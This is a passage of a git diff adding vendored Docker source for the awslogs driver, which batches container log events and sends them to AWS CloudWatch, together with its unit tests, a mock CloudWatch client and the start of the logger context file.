+					inputLogEvent: &cloudwatchlogs.InputLogEvent{
+						Message:   aws.String(string(line)),
+						Timestamp: aws.Int64(msg.Timestamp.UnixNano() / int64(time.Millisecond)),
+					},
+					insertOrder: len(events),
+				})
+				bytes += (lineBytes + perEventBytes)
+			}
+		}
+	}
+}
+
+// publishBatch calls PutLogEvents for a given set of InputLogEvents,
+// accounting for sequencing requirements (each request must reference the
+// sequence token returned by the previous request).
+func (l *logStream) publishBatch(events []wrappedEvent) {
+	if len(events) == 0 {
+		return
+	}
+
+	// events in a batch must be sorted by timestamp
+	// see http://docs.aws.amazon.com/AmazonCloudWatchLogs/latest/APIReference/API_PutLogEvents.html
+	sort.Sort(byTimestamp(events))
+	cwEvents := unwrapEvents(events)
+
+	nextSequenceToken, err := l.putLogEvents(cwEvents, l.sequenceToken)
+
+	if err != nil {
+		if awsErr, ok := err.(awserr.Error); ok {
+			if awsErr.Code() == dataAlreadyAcceptedCode {
+				// already submitted, just grab the correct sequence token
+				parts := strings.Split(awsErr.Message(), " ")
+				nextSequenceToken = &parts[len(parts)-1]
+				logrus.WithFields(logrus.Fields{
+					"errorCode":     awsErr.Code(),
+					"message":       awsErr.Message(),
+					"logGroupName":  l.logGroupName,
+					"logStreamName": l.logStreamName,
+				}).Info("Data already accepted, ignoring error")
+				err = nil
+			} else if awsErr.Code() == invalidSequenceTokenCode {
+				// sequence code is bad, grab the correct one and retry
+				parts := strings.Split(awsErr.Message(), " ")
+				token := parts[len(parts)-1]
+				nextSequenceToken, err = l.putLogEvents(cwEvents, &token)
+			}
+		}
+	}
+	if err != nil {
+		logrus.Error(err)
+	} else {
+		l.sequenceToken = nextSequenceToken
+	}
+}
+
+// putLogEvents wraps the PutLogEvents API
+func (l *logStream) putLogEvents(events []*cloudwatchlogs.InputLogEvent, sequenceToken *string) (*string, error) {
+	input := &cloudwatchlogs.PutLogEventsInput{
+		LogEvents:     events,
+		SequenceToken: sequenceToken,
+		LogGroupName:  aws.String(l.logGroupName),
+		LogStreamName: aws.String(l.logStreamName),
+	}
+	resp, err := l.client.PutLogEvents(input)
+	if err != nil {
+		if awsErr, ok := err.(awserr.Error); ok {
+			logrus.WithFields(logrus.Fields{
+				"errorCode":     awsErr.Code(),
+				"message":       awsErr.Message(),
+				"origError":     awsErr.OrigErr(),
+				"logGroupName":  l.logGroupName,
+				"logStreamName": l.logStreamName,
+			}).Error("Failed to put log events")
+		}
+		return nil, err
+	}
+	return resp.NextSequenceToken, nil
+}
+
+// ValidateLogOpt looks for awslogs-specific log options awslogs-region,
+// awslogs-group, and awslogs-stream
+func ValidateLogOpt(cfg map[string]string) error {
+	for key := range cfg {
+		switch key {
+		case logGroupKey:
+		case logStreamKey:
+		case regionKey:
+		case tagKey:
+		default:
+			return fmt.Errorf("unknown log opt '%s' for %s log driver", key, name)
+		}
+	}
+	if cfg[logGroupKey] == "" {
+		return fmt.Errorf("must specify a value for log opt '%s'", logGroupKey)
+	}
+	return nil
+}
+
+// Len returns the length of a byTimestamp slice.  Len is required by the
+// sort.Interface interface.
+func (slice byTimestamp) Len() int {
+	return len(slice)
+}
+
+// Less compares two values in a byTimestamp slice by Timestamp.  Less is
+// required by the sort.Interface interface.
+func (slice byTimestamp) Less(i, j int) bool {
+	iTimestamp, jTimestamp := int64(0), int64(0)
+	if slice != nil && slice[i].inputLogEvent.Timestamp != nil {
+		iTimestamp = *slice[i].inputLogEvent.Timestamp
+	}
+	if slice != nil && slice[j].inputLogEvent.Timestamp != nil {
+		jTimestamp = *slice[j].inputLogEvent.Timestamp
+	}
+	if iTimestamp == jTimestamp {
+		return slice[i].insertOrder < slice[j].insertOrder
+	}
+	return iTimestamp < jTimestamp
+}
+
+// Swap swaps two values in a byTimestamp slice with each other.  Swap is
+// required by the sort.Interface interface.
+func (slice byTimestamp) Swap(i, j int) {
+	slice[i], slice[j] = slice[j], slice[i]
+}
+
+func unwrapEvents(events []wrappedEvent) []*cloudwatchlogs.InputLogEvent {
+	cwEvents := []*cloudwatchlogs.InputLogEvent{}
+	for _, input := range events {
+		cwEvents = append(cwEvents, input.inputLogEvent)
+	}
+	return cwEvents
+}
diff --git a/vendor/github.com/docker/docker/daemon/logger/awslogs/cloudwatchlogs_test.go b/vendor/github.com/docker/docker/daemon/logger/awslogs/cloudwatchlogs_test.go
new file mode 100644
index 0000000000..d5b1aaef52
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/logger/awslogs/cloudwatchlogs_test.go
@@ -0,0 +1,724 @@
+package awslogs
+
+import (
+	"errors"
+	"fmt"
+	"net/http"
+	"reflect"
+	"runtime"
+	"strings"
+	"testing"
+	"time"
+
+	"github.com/aws/aws-sdk-go/aws"
+	"github.com/aws/aws-sdk-go/aws/awserr"
+	"github.com/aws/aws-sdk-go/aws/request"
+	"github.com/aws/aws-sdk-go/service/cloudwatchlogs"
+	"github.com/docker/docker/daemon/logger"
+	"github.com/docker/docker/daemon/logger/loggerutils"
+	"github.com/docker/docker/dockerversion"
+)
+
+const (
+	groupName         = "groupName"
+	streamName        = "streamName"
+	sequenceToken     = "sequenceToken"
+	nextSequenceToken = "nextSequenceToken"
+	logline           = "this is a log line"
+)
+
+func TestNewAWSLogsClientUserAgentHandler(t *testing.T) {
+	ctx := logger.Context{
+		Config: map[string]string{
+			regionKey: "us-east-1",
+		},
+	}
+
+	client, err := newAWSLogsClient(ctx)
+	if err != nil {
+		t.Fatal(err)
+	}
+	realClient, ok := client.(*cloudwatchlogs.CloudWatchLogs)
+	if !ok {
+		t.Fatal("Could not cast client to cloudwatchlogs.CloudWatchLogs")
+	}
+	buildHandlerList := realClient.Handlers.Build
+	request := &request.Request{
+		HTTPRequest: &http.Request{
+			Header: http.Header{},
+		},
+	}
+	buildHandlerList.Run(request)
+	expectedUserAgentString := fmt.Sprintf("Docker %s (%s) %s/%s (%s; %s; %s)",
+		dockerversion.Version, runtime.GOOS, aws.SDKName, aws.SDKVersion, runtime.Version(), runtime.GOOS, runtime.GOARCH)
+	userAgent := request.HTTPRequest.Header.Get("User-Agent")
+	if userAgent != expectedUserAgentString {
+		t.Errorf("Wrong User-Agent string, expected \"%s\" but was \"%s\"",
+			expectedUserAgentString, userAgent)
+	}
+}
+
+func TestNewAWSLogsClientRegionDetect(t *testing.T) {
+	ctx := logger.Context{
+		Config: map[string]string{},
+	}
+
+	mockMetadata := newMockMetadataClient()
+	newRegionFinder = func() regionFinder {
+		return mockMetadata
+	}
+	mockMetadata.regionResult <- &regionResult{
+		successResult: "us-east-1",
+	}
+
+	_, err := newAWSLogsClient(ctx)
+	if err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestCreateSuccess(t *testing.T) {
+	mockClient := newMockClient()
+	stream := &logStream{
+		client:        mockClient,
+		logGroupName:  groupName,
+		logStreamName: streamName,
+	}
+	mockClient.createLogStreamResult <- &createLogStreamResult{}
+
+	err := stream.create()
+
+	if err != nil {
+		t.Errorf("Received unexpected err: %v\n", err)
+	}
+	argument := <-mockClient.createLogStreamArgument
+	if argument.LogGroupName == nil {
+		t.Fatal("Expected non-nil LogGroupName")
+	}
+	if *argument.LogGroupName != groupName {
+		t.Errorf("Expected LogGroupName to be %s", groupName)
+	}
+	if argument.LogStreamName == nil {
+		t.Fatal("Expected non-nil LogGroupName")
+	}
+	if *argument.LogStreamName != streamName {
+		t.Errorf("Expected LogStreamName to be %s", streamName)
+	}
+}
+
+func TestCreateError(t *testing.T) {
+	mockClient := newMockClient()
+	stream := &logStream{
+		client: mockClient,
+	}
+	mockClient.createLogStreamResult <- &createLogStreamResult{
+		errorResult: errors.New("Error!"),
+	}
+
+	err := stream.create()
+
+	if err == nil {
+		t.Fatal("Expected non-nil err")
+	}
+}
+
+func TestCreateAlreadyExists(t *testing.T) {
+	mockClient := newMockClient()
+	stream := &logStream{
+		client: mockClient,
+	}
+	mockClient.createLogStreamResult <- &createLogStreamResult{
+		errorResult: awserr.New(resourceAlreadyExistsCode, "", nil),
+	}
+
+	err := stream.create()
+
+	if err != nil {
+		t.Fatal("Expected nil err")
+	}
+}
+
+func TestPublishBatchSuccess(t *testing.T) {
+	mockClient := newMockClient()
+	stream := &logStream{
+		client:        mockClient,
+		logGroupName:  groupName,
+		logStreamName: streamName,
+		sequenceToken: aws.String(sequenceToken),
+	}
+	mockClient.putLogEventsResult <- &putLogEventsResult{
+		successResult: &cloudwatchlogs.PutLogEventsOutput{
+			NextSequenceToken: aws.String(nextSequenceToken),
+		},
+	}
+	events := []wrappedEvent{
+		{
+			inputLogEvent: &cloudwatchlogs.InputLogEvent{
+				Message: aws.String(logline),
+			},
+		},
+	}
+
+	stream.publishBatch(events)
+	if stream.sequenceToken == nil {
+		t.Fatal("Expected non-nil sequenceToken")
+	}
+	if *stream.sequenceToken != nextSequenceToken {
+		t.Errorf("Expected sequenceToken to be %s, but was %s", nextSequenceToken, *stream.sequenceToken)
+	}
+	argument := <-mockClient.putLogEventsArgument
+	if argument == nil {
+		t.Fatal("Expected non-nil PutLogEventsInput")
+	}
+	if argument.SequenceToken == nil {
+		t.Fatal("Expected non-nil PutLogEventsInput.SequenceToken")
+	}
+	if *argument.SequenceToken != sequenceToken {
+		t.Errorf("Expected PutLogEventsInput.SequenceToken to be %s, but was %s", sequenceToken, *argument.SequenceToken)
+	}
+	if len(argument.LogEvents) != 1 {
+		t.Errorf("Expected LogEvents to contain 1 element, but contains %d", len(argument.LogEvents))
+	}
+	if argument.LogEvents[0] != events[0].inputLogEvent {
+		t.Error("Expected event to equal input")
+	}
+}
+
+func TestPublishBatchError(t *testing.T) {
+	mockClient := newMockClient()
+	stream := &logStream{
+		client:        mockClient,
+		logGroupName:  groupName,
+		logStreamName: streamName,
+		sequenceToken: aws.String(sequenceToken),
+	}
+	mockClient.putLogEventsResult <- &putLogEventsResult{
+		errorResult: errors.New("Error!"),
+	}
+
+	events := []wrappedEvent{
+		{
+			inputLogEvent: &cloudwatchlogs.InputLogEvent{
+				Message: aws.String(logline),
+			},
+		},
+	}
+
+	stream.publishBatch(events)
+	if stream.sequenceToken == nil {
+		t.Fatal("Expected non-nil sequenceToken")
+	}
+	if *stream.sequenceToken != sequenceToken {
+		t.Errorf("Expected sequenceToken to be %s, but was %s", sequenceToken, *stream.sequenceToken)
+	}
+}
+
+func TestPublishBatchInvalidSeqSuccess(t *testing.T) {
+	mockClient := newMockClientBuffered(2)
+	stream := &logStream{
+		client:        mockClient,
+		logGroupName:  groupName,
+		logStreamName: streamName,
+		sequenceToken: aws.String(sequenceToken),
+	}
+	mockClient.putLogEventsResult <- &putLogEventsResult{
+		errorResult: awserr.New(invalidSequenceTokenCode, "use token token", nil),
+	}
+	mockClient.putLogEventsResult <- &putLogEventsResult{
+		successResult: &cloudwatchlogs.PutLogEventsOutput{
+			NextSequenceToken: aws.String(nextSequenceToken),
+		},
+	}
+
+	events := []wrappedEvent{
+		{
+			inputLogEvent: &cloudwatchlogs.InputLogEvent{
+				Message: aws.String(logline),
+			},
+		},
+	}
+
+	stream.publishBatch(events)
+	if stream.sequenceToken == nil {
+		t.Fatal("Expected non-nil sequenceToken")
+	}
+	if *stream.sequenceToken != nextSequenceToken {
+		t.Errorf("Expected sequenceToken to be %s, but was %s", nextSequenceToken, *stream.sequenceToken)
+	}
+
+	argument := <-mockClient.putLogEventsArgument
+	if argument == nil {
+		t.Fatal("Expected non-nil PutLogEventsInput")
+	}
+	if argument.SequenceToken == nil {
+		t.Fatal("Expected non-nil PutLogEventsInput.SequenceToken")
+	}
+	if *argument.SequenceToken != sequenceToken {
+		t.Errorf("Expected PutLogEventsInput.SequenceToken to be %s, but was %s", sequenceToken, *argument.SequenceToken)
+	}
+	if len(argument.LogEvents) != 1 {
+		t.Errorf("Expected LogEvents to contain 1 element, but contains %d", len(argument.LogEvents))
+	}
+	if argument.LogEvents[0] != events[0].inputLogEvent {
+		t.Error("Expected event to equal input")
+	}
+
+	argument = <-mockClient.putLogEventsArgument
+	if argument == nil {
+		t.Fatal("Expected non-nil PutLogEventsInput")
+	}
+	if argument.SequenceToken == nil {
+		t.Fatal("Expected non-nil PutLogEventsInput.SequenceToken")
+	}
+	if *argument.SequenceToken != "token" {
+		t.Errorf("Expected PutLogEventsInput.SequenceToken to be %s, but was %s", "token", *argument.SequenceToken)
+	}
+	if len(argument.LogEvents) != 1 {
+		t.Errorf("Expected LogEvents to contain 1 element, but contains %d", len(argument.LogEvents))
+	}
+	if argument.LogEvents[0] != events[0].inputLogEvent {
+		t.Error("Expected event to equal input")
+	}
+}
+
+func TestPublishBatchAlreadyAccepted(t *testing.T) {
+	mockClient := newMockClient()
+	stream := &logStream{
+		client:        mockClient,
+		logGroupName:  groupName,
+		logStreamName: streamName,
+		sequenceToken: aws.String(sequenceToken),
+	}
+	mockClient.putLogEventsResult <- &putLogEventsResult{
+		errorResult: awserr.New(dataAlreadyAcceptedCode, "use token token", nil),
+	}
+
+	events := []wrappedEvent{
+		{
+			inputLogEvent: &cloudwatchlogs.InputLogEvent{
+				Message: aws.String(logline),
+			},
+		},
+	}
+
+	stream.publishBatch(events)
+	if stream.sequenceToken == nil {
+		t.Fatal("Expected non-nil sequenceToken")
+	}
+	if *stream.sequenceToken != "token" {
+		t.Errorf("Expected sequenceToken to be %s, but was %s", "token", *stream.sequenceToken)
+	}
+
+	argument := <-mockClient.putLogEventsArgument
+	if argument == nil {
+		t.Fatal("Expected non-nil PutLogEventsInput")
+	}
+	if argument.SequenceToken == nil {
+		t.Fatal("Expected non-nil PutLogEventsInput.SequenceToken")
+	}
+	if *argument.SequenceToken != sequenceToken {
+		t.Errorf("Expected PutLogEventsInput.SequenceToken to be %s, but was %s", sequenceToken, *argument.SequenceToken)
+	}
+	if len(argument.LogEvents) != 1 {
+		t.Errorf("Expected LogEvents to contain 1 element, but contains %d", len(argument.LogEvents))
+	}
+	if argument.LogEvents[0] != events[0].inputLogEvent {
+		t.Error("Expected event to equal input")
+	}
+}
+
+func TestCollectBatchSimple(t *testing.T) {
+	mockClient := newMockClient()
+	stream := &logStream{
+		client:        mockClient,
+		logGroupName:  groupName,
+		logStreamName: streamName,
+		sequenceToken: aws.String(sequenceToken),
+		messages:      make(chan *logger.Message),
+	}
+	mockClient.putLogEventsResult <- &putLogEventsResult{
+		successResult: &cloudwatchlogs.PutLogEventsOutput{
+			NextSequenceToken: aws.String(nextSequenceToken),
+		},
+	}
+	ticks := make(chan time.Time)
+	newTicker = func(_ time.Duration) *time.Ticker {
+		return &time.Ticker{
+			C: ticks,
+		}
+	}
+
+	go stream.collectBatch()
+
+	stream.Log(&logger.Message{
+		Line:      []byte(logline),
+		Timestamp: time.Time{},
+	})
+
+	ticks <- time.Time{}
+	stream.Close()
+
+	argument := <-mockClient.putLogEventsArgument
+	if argument == nil {
+		t.Fatal("Expected non-nil PutLogEventsInput")
+	}
+	if len(argument.LogEvents) != 1 {
+		t.Errorf("Expected LogEvents to contain 1 element, but contains %d", len(argument.LogEvents))
+	}
+	if *argument.LogEvents[0].Message != logline {
+		t.Errorf("Expected message to be %s but was %s", logline, *argument.LogEvents[0].Message)
+	}
+}
+
+func TestCollectBatchTicker(t *testing.T) {
+	mockClient := newMockClient()
+	stream := &logStream{
+		client:        mockClient,
+		logGroupName:  groupName,
+		logStreamName: streamName,
+		sequenceToken: aws.String(sequenceToken),
+		messages:      make(chan *logger.Message),
+	}
+	mockClient.putLogEventsResult <- &putLogEventsResult{
+		successResult: &cloudwatchlogs.PutLogEventsOutput{
+			NextSequenceToken: aws.String(nextSequenceToken),
+		},
+	}
+	ticks := make(chan time.Time)
+	newTicker = func(_ time.Duration) *time.Ticker {
+		return &time.Ticker{
+			C: ticks,
+		}
+	}
+
+	go stream.collectBatch()
+
+	stream.Log(&logger.Message{
+		Line:      []byte(logline + " 1"),
+		Timestamp: time.Time{},
+	})
+	stream.Log(&logger.Message{
+		Line:      []byte(logline + " 2"),
+		Timestamp: time.Time{},
+	})
+
+	ticks <- time.Time{}
+
+	// Verify first batch
+	argument := <-mockClient.putLogEventsArgument
+	if argument == nil {
+		t.Fatal("Expected non-nil PutLogEventsInput")
+	}
+	if len(argument.LogEvents) != 2 {
+		t.Errorf("Expected LogEvents to contain 2 elements, but contains %d", len(argument.LogEvents))
+	}
+	if *argument.LogEvents[0].Message != logline+" 1" {
+		t.Errorf("Expected message to be %s but was %s", logline+" 1", *argument.LogEvents[0].Message)
+	}
+	if *argument.LogEvents[1].Message != logline+" 2" {
+		t.Errorf("Expected message to be %s but was %s", logline+" 2", *argument.LogEvents[0].Message)
+	}
+
+	stream.Log(&logger.Message{
+		Line:      []byte(logline + " 3"),
+		Timestamp: time.Time{},
+	})
+
+	ticks <- time.Time{}
+	argument = <-mockClient.putLogEventsArgument
+	if argument == nil {
+		t.Fatal("Expected non-nil PutLogEventsInput")
+	}
+	if len(argument.LogEvents) != 1 {
+		t.Errorf("Expected LogEvents to contain 1 elements, but contains %d", len(argument.LogEvents))
+	}
+	if *argument.LogEvents[0].Message != logline+" 3" {
+		t.Errorf("Expected message to be %s but was %s", logline+" 3", *argument.LogEvents[0].Message)
+	}
+
+	stream.Close()
+
+}
+
+func TestCollectBatchClose(t *testing.T) {
+	mockClient := newMockClient()
+	stream := &logStream{
+		client:        mockClient,
+		logGroupName:  groupName,
+		logStreamName: streamName,
+		sequenceToken: aws.String(sequenceToken),
+		messages:      make(chan *logger.Message),
+	}
+	mockClient.putLogEventsResult <- &putLogEventsResult{
+		successResult: &cloudwatchlogs.PutLogEventsOutput{
+			NextSequenceToken: aws.String(nextSequenceToken),
+		},
+	}
+	var ticks = make(chan time.Time)
+	newTicker = func(_ time.Duration) *time.Ticker {
+		return &time.Ticker{
+			C: ticks,
+		}
+	}
+
+	go stream.collectBatch()
+
+	stream.Log(&logger.Message{
+		Line:      []byte(logline),
+		Timestamp: time.Time{},
+	})
+
+	// no ticks
+	stream.Close()
+
+	argument := <-mockClient.putLogEventsArgument
+	if argument == nil {
+		t.Fatal("Expected non-nil PutLogEventsInput")
+	}
+	if len(argument.LogEvents) != 1 {
+		t.Errorf("Expected LogEvents to contain 1 element, but contains %d", len(argument.LogEvents))
+	}
+	if *argument.LogEvents[0].Message != logline {
+		t.Errorf("Expected message to be %s but was %s", logline, *argument.LogEvents[0].Message)
+	}
+}
+
+func TestCollectBatchLineSplit(t *testing.T) {
+	mockClient := newMockClient()
+	stream := &logStream{
+		client:        mockClient,
+		logGroupName:  groupName,
+		logStreamName: streamName,
+		sequenceToken: aws.String(sequenceToken),
+		messages:      make(chan *logger.Message),
+	}
+	mockClient.putLogEventsResult <- &putLogEventsResult{
+		successResult: &cloudwatchlogs.PutLogEventsOutput{
+			NextSequenceToken: aws.String(nextSequenceToken),
+		},
+	}
+	var ticks = make(chan time.Time)
+	newTicker = func(_ time.Duration) *time.Ticker {
+		return &time.Ticker{
+			C: ticks,
+		}
+	}
+
+	go stream.collectBatch()
+
+	longline := strings.Repeat("A", maximumBytesPerEvent)
+	stream.Log(&logger.Message{
+		Line:      []byte(longline + "B"),
+		Timestamp: time.Time{},
+	})
+
+	// no ticks
+	stream.Close()
+
+	argument := <-mockClient.putLogEventsArgument
+	if argument == nil {
+		t.Fatal("Expected non-nil PutLogEventsInput")
+	}
+	if len(argument.LogEvents) != 2 {
+		t.Errorf("Expected LogEvents to contain 2 elements, but contains %d", len(argument.LogEvents))
+	}
+	if *argument.LogEvents[0].Message != longline {
+		t.Errorf("Expected message to be %s but was %s", longline, *argument.LogEvents[0].Message)
+	}
+	if *argument.LogEvents[1].Message != "B" {
+		t.Errorf("Expected message to be %s but was %s", "B", *argument.LogEvents[1].Message)
+	}
+}
+
+func TestCollectBatchMaxEvents(t *testing.T) {
+	mockClient := newMockClientBuffered(1)
+	stream := &logStream{
+		client:        mockClient,
+		logGroupName:  groupName,
+		logStreamName: streamName,
+		sequenceToken: aws.String(sequenceToken),
+		messages:      make(chan *logger.Message),
+	}
+	mockClient.putLogEventsResult <- &putLogEventsResult{
+		successResult: &cloudwatchlogs.PutLogEventsOutput{
+			NextSequenceToken: aws.String(nextSequenceToken),
+		},
+	}
+	var ticks = make(chan time.Time)
+	newTicker = func(_ time.Duration) *time.Ticker {
+		return &time.Ticker{
+			C: ticks,
+		}
+	}
+
+	go stream.collectBatch()
+
+	line := "A"
+	for i := 0; i <= maximumLogEventsPerPut; i++ {
+		stream.Log(&logger.Message{
+			Line:      []byte(line),
+			Timestamp: time.Time{},
+		})
+	}
+
+	// no ticks
+	stream.Close()
+
+	argument := <-mockClient.putLogEventsArgument
+	if argument == nil {
+		t.Fatal("Expected non-nil PutLogEventsInput")
+	}
+	if len(argument.LogEvents) != maximumLogEventsPerPut {
+		t.Errorf("Expected LogEvents to contain %d elements, but contains %d", maximumLogEventsPerPut, len(argument.LogEvents))
+	}
+
+	argument = <-mockClient.putLogEventsArgument
+	if argument == nil {
+		t.Fatal("Expected non-nil PutLogEventsInput")
+	}
+	if len(argument.LogEvents) != 1 {
+		t.Errorf("Expected LogEvents to contain %d elements, but contains %d", 1, len(argument.LogEvents))
+	}
+}
+
+func TestCollectBatchMaxTotalBytes(t *testing.T) {
+	mockClient := newMockClientBuffered(1)
+	stream := &logStream{
+		client:        mockClient,
+		logGroupName:  groupName,
+		logStreamName: streamName,
+		sequenceToken: aws.String(sequenceToken),
+		messages:      make(chan *logger.Message),
+	}
+	mockClient.putLogEventsResult <- &putLogEventsResult{
+		successResult: &cloudwatchlogs.PutLogEventsOutput{
+			NextSequenceToken: aws.String(nextSequenceToken),
+		},
+	}
+	var ticks = make(chan time.Time)
+	newTicker = func(_ time.Duration) *time.Ticker {
+		return &time.Ticker{
+			C: ticks,
+		}
+	}
+
+	go stream.collectBatch()
+
+	longline := strings.Repeat("A", maximumBytesPerPut)
+	stream.Log(&logger.Message{
+		Line:      []byte(longline + "B"),
+		Timestamp: time.Time{},
+	})
+
+	// no ticks
+	stream.Close()
+
+	argument := <-mockClient.putLogEventsArgument
+	if argument == nil {
+		t.Fatal("Expected non-nil PutLogEventsInput")
+	}
+	bytes := 0
+	for _, event := range argument.LogEvents {
+		bytes += len(*event.Message)
+	}
+	if bytes > maximumBytesPerPut {
+		t.Errorf("Expected <= %d bytes but was %d", maximumBytesPerPut, bytes)
+	}
+
+	argument = <-mockClient.putLogEventsArgument
+	if len(argument.LogEvents) != 1 {
+		t.Errorf("Expected LogEvents to contain 1 elements, but contains %d", len(argument.LogEvents))
+	}
+	message := *argument.LogEvents[0].Message
+	if message[len(message)-1:] != "B" {
+		t.Errorf("Expected message to be %s but was %s", "B", message[len(message)-1:])
+	}
+}
+
+func TestCollectBatchWithDuplicateTimestamps(t *testing.T) {
+	mockClient := newMockClient()
+	stream := &logStream{
+		client:        mockClient,
+		logGroupName:  groupName,
+		logStreamName: streamName,
+		sequenceToken: aws.String(sequenceToken),
+		messages:      make(chan *logger.Message),
+	}
+	mockClient.putLogEventsResult <- &putLogEventsResult{
+		successResult: &cloudwatchlogs.PutLogEventsOutput{
+			NextSequenceToken: aws.String(nextSequenceToken),
+		},
+	}
+	ticks := make(chan time.Time)
+	newTicker = func(_ time.Duration) *time.Ticker {
+		return &time.Ticker{
+			C: ticks,
+		}
+	}
+
+	go stream.collectBatch()
+
+	times := maximumLogEventsPerPut
+	expectedEvents := []*cloudwatchlogs.InputLogEvent{}
+	timestamp := time.Now()
+	for i := 0; i < times; i++ {
+		line := fmt.Sprintf("%d", i)
+		if i%2 == 0 {
+			timestamp.Add(1 * time.Nanosecond)
+		}
+		stream.Log(&logger.Message{
+			Line:      []byte(line),
+			Timestamp: timestamp,
+		})
+		expectedEvents = append(expectedEvents, &cloudwatchlogs.InputLogEvent{
+			Message:   aws.String(line),
+			Timestamp: aws.Int64(timestamp.UnixNano() / int64(time.Millisecond)),
+		})
+	}
+
+	ticks <- time.Time{}
+	stream.Close()
+
+	argument := <-mockClient.putLogEventsArgument
+	if argument == nil {
+		t.Fatal("Expected non-nil PutLogEventsInput")
+	}
+	if len(argument.LogEvents) != times {
+		t.Errorf("Expected LogEvents to contain %d elements, but contains %d", times, len(argument.LogEvents))
+	}
+	for i := 0; i < times; i++ {
+		if !reflect.DeepEqual(*argument.LogEvents[i], *expectedEvents[i]) {
+			t.Errorf("Expected event to be %v but was %v", *expectedEvents[i], *argument.LogEvents[i])
+		}
+	}
+}
+
+func TestCreateTagSuccess(t *testing.T) {
+	mockClient := newMockClient()
+	ctx := logger.Context{
+		ContainerName: "/test-container",
+		ContainerID:   "container-abcdefghijklmnopqrstuvwxyz01234567890",
+		Config:        map[string]string{"tag": "{{.Name}}/{{.FullID}}"},
+	}
+	logStreamName, e := loggerutils.ParseLogTag(ctx, loggerutils.DefaultTemplate)
+	if e != nil {
+		t.Errorf("Error generating tag: %q", e)
+	}
+	stream := &logStream{
+		client:        mockClient,
+		logGroupName:  groupName,
+		logStreamName: logStreamName,
+	}
+	mockClient.createLogStreamResult <- &createLogStreamResult{}
+
+	err := stream.create()
+
+	if err != nil {
+		t.Errorf("Received unexpected err: %v\n", err)
+	}
+	argument := <-mockClient.createLogStreamArgument
+
+	if *argument.LogStreamName != "test-container/container-abcdefghijklmnopqrstuvwxyz01234567890" {
+		t.Errorf("Expected LogStreamName to be %s", "test-container/container-abcdefghijklmnopqrstuvwxyz01234567890")
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/logger/awslogs/cwlogsiface_mock_test.go b/vendor/github.com/docker/docker/daemon/logger/awslogs/cwlogsiface_mock_test.go
new file mode 100644
index 0000000000..b768a3d7ec
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/logger/awslogs/cwlogsiface_mock_test.go
@@ -0,0 +1,77 @@
+package awslogs
+
+import "github.com/aws/aws-sdk-go/service/cloudwatchlogs"
+
+type mockcwlogsclient struct {
+	createLogStreamArgument chan *cloudwatchlogs.CreateLogStreamInput
+	createLogStreamResult   chan *createLogStreamResult
+	putLogEventsArgument    chan *cloudwatchlogs.PutLogEventsInput
+	putLogEventsResult      chan *putLogEventsResult
+}
+
+type createLogStreamResult struct {
+	successResult *cloudwatchlogs.CreateLogStreamOutput
+	errorResult   error
+}
+
+type putLogEventsResult struct {
+	successResult *cloudwatchlogs.PutLogEventsOutput
+	errorResult   error
+}
+
+func newMockClient() *mockcwlogsclient {
+	return &mockcwlogsclient{
+		createLogStreamArgument: make(chan *cloudwatchlogs.CreateLogStreamInput, 1),
+		createLogStreamResult:   make(chan *createLogStreamResult, 1),
+		putLogEventsArgument:    make(chan *cloudwatchlogs.PutLogEventsInput, 1),
+		putLogEventsResult:      make(chan *putLogEventsResult, 1),
+	}
+}
+
+func newMockClientBuffered(buflen int) *mockcwlogsclient {
+	return &mockcwlogsclient{
+		createLogStreamArgument: make(chan *cloudwatchlogs.CreateLogStreamInput, buflen),
+		createLogStreamResult:   make(chan *createLogStreamResult, buflen),
+		putLogEventsArgument:    make(chan *cloudwatchlogs.PutLogEventsInput, buflen),
+		putLogEventsResult:      make(chan *putLogEventsResult, buflen),
+	}
+}
+
+func (m *mockcwlogsclient) CreateLogStream(input *cloudwatchlogs.CreateLogStreamInput) (*cloudwatchlogs.CreateLogStreamOutput, error) {
+	m.createLogStreamArgument <- input
+	output := <-m.createLogStreamResult
+	return output.successResult, output.errorResult
+}
+
+func (m *mockcwlogsclient) PutLogEvents(input *cloudwatchlogs.PutLogEventsInput) (*cloudwatchlogs.PutLogEventsOutput, error) {
+	events := make([]*cloudwatchlogs.InputLogEvent, len(input.LogEvents))
+	copy(events, input.LogEvents)
+	m.putLogEventsArgument <- &cloudwatchlogs.PutLogEventsInput{
+		LogEvents:     events,
+		SequenceToken: input.SequenceToken,
+		LogGroupName:  input.LogGroupName,
+		LogStreamName: input.LogStreamName,
+	}
+	output := <-m.putLogEventsResult
+	return output.successResult, output.errorResult
+}
+
+type mockmetadataclient struct {
+	regionResult chan *regionResult
+}
+
+type regionResult struct {
+	successResult string
+	errorResult   error
+}
+
+func newMockMetadataClient() *mockmetadataclient {
+	return &mockmetadataclient{
+		regionResult: make(chan *regionResult, 1),
+	}
+}
+
+func (m *mockmetadataclient) Region() (string, error) {
+	output := <-m.regionResult
+	return output.successResult, output.errorResult
+}
diff --git a/vendor/github.com/docker/docker/daemon/logger/context.go b/vendor/github.com/docker/docker/daemon/logger/context.go
new file mode 100644
index 0000000000..085ab01a18
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/logger/context.go
@@ -0,0 +1,111 @@
+package logger
+
+import (
+	"fmt"
+	"os"
+	"strings"
+	"time"
+)
+
+// Context provides enough information for a logging driver to do its function.
+type Context struct {
+	Config              map[string]string
+	ContainerID         string
+	ContainerName       string
+	ContainerEntrypoint string
+	ContainerArgs       []string
+	ContainerImageID    string
+	ContainerImageName  string
+	ContainerCreated    time.Time
+	ContainerEnv        []string
+	ContainerLabels     map[string]string
+	LogPath             string
+	DaemonName          string
+}
+
+// ExtraAttributes returns the user-defined extra attributes (labels,
+// environment variables) in key-value format. This can be used by log drivers
+// that support metadata to add more context to a log.
+func (ctx *Context) ExtraAttributes(keyMod func(string) string) map[string]string {
+	extra := make(map[string]string)
+	labels, ok := ctx.Config["labels"]
+	if ok && len(labels) > 0 {
+		for _, l := range strings.Split(labels, ",") {
+			if v, ok := ctx.ContainerLabels[l]; ok {
+				if keyMod != nil {
+					l = keyMod(l)
+				}
+				extra[l] = v
+			}
+		}
+	}
+
+	env, ok := ctx.Config["env"]
+	if ok && len(env) > 0 {
+		envMapping := make(map[string]string)
+		for _, e := range ctx.ContainerEnv {
+			if kv := strings.SplitN(e, "=", 2); len(kv) == 2 {
+				envMapping[kv[0]] = kv[1]
+			}
+		}
+		for _, l := range strings.Split(env, ",") {
